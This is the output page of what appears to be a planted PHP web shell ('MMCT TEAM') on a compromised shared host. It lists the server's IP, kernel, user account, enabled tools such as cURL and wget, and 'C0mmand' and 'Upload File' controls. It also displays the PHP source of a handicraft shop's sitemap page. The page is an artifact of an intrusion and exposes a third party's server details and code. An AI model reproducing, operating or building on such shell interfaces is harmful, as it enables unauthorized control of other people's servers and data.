MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.145.58.90
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/rajwadahouse.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/rajwadahouse.com/sitemap.php
<?php
session_start();
?>
<!doctype html>
<html class="no-js" lang="zxx">


<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php include "top-links.php"; ?>
    <title>Sitemap | Rajwada House</title>
    <meta name="description" content="Sitemap | Rajwada House">
    <style>
        .section-sitemap {
            margin-top: 20px;
            margin-bottom: 20px;
        }
    </style>

</head>

<body>

    <div id="main-wrapper">

        <?php include "header.php"; ?>

        <!-- Page Banner Section Start -->
        <div class="page-banner-section section bg-image" data-bg="<?php echo $wspath ?>assets/images/bg/breadcrumb.jpg">
            <div class="container">
                <div class="row">
                    <div class="col">

                        <div class="page-banner text-center">
                            <h1>Sitemap</h1>
                            <ul class="page-breadcrumb">
                                <li><a href="<?php echo $wspath ?>">Home</a></li>
                                <li>Sitemap</li>
                            </ul>
                        </div>

                    </div>
                </div>
            </div>
        </div>
        <!-- Page Banner Section End -->


        <div class="section-sitemap ">
            <div class="container">
                <div class="text-center">
                    <h3>Useful Links</h3>
                </div>
                <div class="row">
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath ?>">Home</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>about.html">About</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>shop.html">Shop</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>contact.html">Contact</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>ship-and-delivery-policy.html">Shipping & Return Policy</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>terms-conditions.html">Terms & Conditions</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>privacy-policy.html">Privacy Policy</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath ?>">Blog</a>
                    </div>
                    <div class="col-lg-3">
                        <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                            href="<?php echo $wspath ?>sitemap.html">Sitemap</a>
                    </div>
                </div>
                <div class="text-center">
                    <h3>Handloom Products</h3>
                </div>
                <div class="row">
                    <?php
                    $sql = "SELECT * FROM `tbl_tourspots` WHERE main_cat_id=27 ORDER BY subcat_order_by ASC";
                    $run = mysqli_query($db, $sql) or die("Query Not run");
                    $count = 0;
                    while ($data = mysqli_fetch_assoc($run)) {
                        $count++;
                        ?>
                        <div class="col-lg-3">
                            <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                                href="<?php echo $wspath ?>category<?php echo $data['spots_url']; ?>.html"><?php echo $data['spots_name'] ?></a>
                        </div>
                        <?php
                    }
                    $maincatid = $_GET['id'];
                    ?>
                </div>
                <div class="text-center">
                    <h3>Handicraft Products</h3>
                </div>
                <div class="row">
                    <?php
                    $sql = "SELECT * FROM `tbl_tourspots` WHERE main_cat_id=28 ORDER BY subcat_order_by ASC";
                    $run = mysqli_query($db, $sql) or die("Query Not run");
                    $count = 0;
                    while ($data = mysqli_fetch_assoc($run)) {
                        $count++;
                        ?>
                        <div class="col-lg-3">
                            <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                                href="<?php echo $wspath ?>category<?php echo $data['spots_url']; ?>.html"><?php echo $data['spots_name'] ?></a>
                        </div>
                        <?php
                    }
                    $maincatid = $_GET['id'];
                    ?>
                </div>
                <div class="text-center">
                    <h3>Our Products</h3>
                </div>
                <div class="row">
                    <?php
                    $sqlpro = "SELECT * FROM `tbl_services`";
                    $runpro = mysqli_query($db, $sqlpro) or die("Query Not run");
                    while ($datapro = mysqli_fetch_assoc($runpro)) {
                        ?>
                        <div class="col-lg-3">
                            <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a
                                href="<?php echo $wspath ?>product<?php echo $datapro['slug_url']; ?>.html"><?php echo $datapro['name'] ?></a>
                        </div>
                        <?php
                    }

                    ?>
                </div>


            </div>
        </div>


        <?php include "footer.php"; ?>

    </div>


</body>


</html>

MMCT - 2023